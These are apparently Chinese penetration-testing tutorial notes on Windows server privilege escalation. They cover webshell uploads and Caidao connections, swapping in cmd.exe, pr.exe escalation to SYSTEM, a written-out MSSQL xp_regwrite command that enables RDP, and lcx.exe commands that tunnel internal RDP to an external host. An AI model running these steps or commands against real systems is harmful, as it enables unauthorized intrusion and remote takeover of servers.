一、一般脚本所处的权限

1、asp/php  匿名权限

2、aspx        user权限

3、jsp          系统权限

二、不同脚本，权限也不同

1、上传普通一句话木马，然后用菜刀连接

2、进入终端，输入命令

3、我们上传一个大马，访问

4、输入命令，可以正常执行

三、cmd无法执行

1、上传一个大马，访问

2、进入cmd命令界面，发现不能执行

3、找一个可读写目录，上传本地的cmd.exe

4、把路径修改为我们上传的路径，执行命令

四、PR提权

一、执行whoami获取权限

二、上传pr.exe,重新获取权限，直接就是system权限

五、MSSQL提权

1、打开sqltools，输入ip、端口、用户名、密码、数据库名，然后点击连接，提示连接成功

2、dos命令可以成功执行

3、连接3389提示错误

4、执行下面命令，打开3389

exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--

5、继续连接3389端口

内网

六、端口转发

1、将lcx.exe上传到服务器，运行

lcx.exe -slave 192.168.171.128(外网) 2222 127.0.0.1（内网） 3389

2、在本地运行

lcx.exe -listen 1111 2222

3、打开远程桌面连接，输入127.0.0.1:2222，成功连接